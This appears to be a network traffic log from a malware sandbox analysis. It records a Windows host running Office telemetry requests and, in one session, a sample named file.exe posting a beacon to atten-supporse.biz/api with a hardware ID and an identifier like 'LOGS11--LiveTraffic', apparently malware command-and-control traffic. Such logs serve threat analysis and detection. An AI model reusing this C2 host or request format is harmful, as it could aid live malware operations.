                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                    x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184928Z-174f7845968glpgnhC1EWR7uec00000010d000000000hnyu
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:28 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    31192.168.2.64974213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:28 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:28 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                    x-ms-request-id: 905b8fff-d01e-00a1-0300-4235b1000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184928Z-174f78459684bddphC1EWRbht4000000103g000000005pt0
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    32192.168.2.64974313.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:28 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:28 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                    x-ms-request-id: f5c4af5a-301e-005d-6385-3fe448000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184928Z-174f7845968n2hr8hC1EWR9cag0000001020000000001yde
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:29 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    33192.168.2.64974413.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:29 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:29 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                    x-ms-request-id: dadfc1b6-201e-0096-500b-41ace6000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184929Z-174f7845968j6t2phC1EWRcfe800000010eg00000000d0dh
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:29 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    34192.168.2.64974513.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:30 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:30 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 428
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                    ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                    x-ms-request-id: b254496e-901e-0016-2991-3fefe9000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184930Z-174f7845968j6t2phC1EWRcfe800000010eg00000000d0g0
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:31 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    35192.168.2.64974713.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:30 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:31 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                    ETag: "0x8DC582B988EBD12"
                                                                                                                                                                                    x-ms-request-id: f440c5dc-801e-0047-7891-3f7265000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184931Z-174f7845968vqt9xhC1EWRgten00000010bg00000000bppr
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:31 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    36192.168.2.64974613.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:30 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:31 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 499
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                    ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                    x-ms-request-id: 89e88ad2-001e-0065-4491-3f0b73000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184931Z-174f78459685726chC1EWRsnbg00000010cg000000009a0m
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:31 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    37192.168.2.64974813.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:31 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:31 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                                    x-ms-request-id: 8b97b4d7-e01e-0003-5405-410fa8000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184931Z-174f7845968pght8hC1EWRyvxg00000003g0000000006w8e
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:32 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    38192.168.2.649749104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:31 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 88
                                                                                                                                                                                    Host: atten-supporse.biz
                                                                                                                                                                                    2024-11-29 18:49:31 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 46 30 43 36 44 39 43 43 35 32 30 45 31 37 32 32 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34
                                                                                                                                                                                    Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=F0C6D9CC520E1722EFA3D63B69E7CA14
                                                                                                                                                                                    2024-11-29 18:49:32 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:32 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=hghdgorf34dmr3lhjvnunr9kt6; expires=Tue, 25-Mar-2025 12:36:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cY%2B%2FJTgEYWPg5xFEOgKOeEB3YPveV%2BMJccg2WfH4c%2BnjfLOl73hoc1Uj1Htw1467M%2BTtwTyR4PF7aJtTk5N7L0u0H1IOxMK8iQtfHoQimLgdWWRZCPJQhrW44PTGfjQB5jCtyZc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c7389d9bf791-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1655&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=990&delivery_rate=1711606&cwnd=65&unsent_bytes=0&cid=fc843c6e4eafcd06&ts=813&x=0"
                                                                                                                                                                                    2024-11-29 18:49:32 UTC214INData Raw: 64 30 0d 0a 67 6e 32 78 38 6d 59 63 79 49 70 71 65 56 65 72 38 75 37 4b 37 58 6a 68 4d 47 34 6e 34 43 33 4b 48 44 54 77 6d 69 77 76 73 63 7a 5a 42 70 4f 48 52 43 62 71 34 68 34 4e 4a 35 47 75 77 5a 62 43 53 64 6b 46 51 42 58 52 47 4f 51 74 42 63 4f 30 48 52 6e 74 34 2b 30 62 31 36 35 4a 65 4b 33 73 52 42 77 76 7a 74 44 43 36 49 73 4d 77 77 70 65 43 38 4a 49 36 43 59 46 6a 62 5a 58 44 63 54 75 75 46 2f 5a 68 68 4a 73 38 74 5a 46 4a 58 69 61 79 74 76 6b 33 30 6e 55 48 6c 38 57 30 77 50 37 4b 6d 6a 66 36 56 68 4b 30 4b 48 65 55 73 4f 54 43 48 69 6e 35 30 51 63 4c 38 37 51 77 75 69 4c 44 4d 4d 4b 58 67 76 43 53 4f 67 6d 42 49 33 48 0d 0a
                                                                                                                                                                                    Data Ascii: d0gn2x8mYcyIpqeVer8u7K7XjhMG4n4C3KHDTwmiwvsczZBpOHRCbq4h4NJ5GuwZbCSdkFQBXRGOQtBcO0HRnt4+0b165JeK3sRBwvztDC6IsMwwpeC8JI6CYFjbZXDcTuuF/ZhhJs8tZFJXiaytvk30nUHl8W0wP7Kmjf6VhK0KHeUsOTCHin50QcL87QwuiLDMMKXgvCSOgmBI3H
                                                                                                                                                                                    2024-11-29 18:49:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    39192.168.2.64974113.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:32 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:32 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9748630E"
                                                                                                                                                                                    x-ms-request-id: 02716611-001e-00ad-7089-3f554b000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184932Z-174f7845968j6t2phC1EWRcfe800000010h0000000005qaz
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
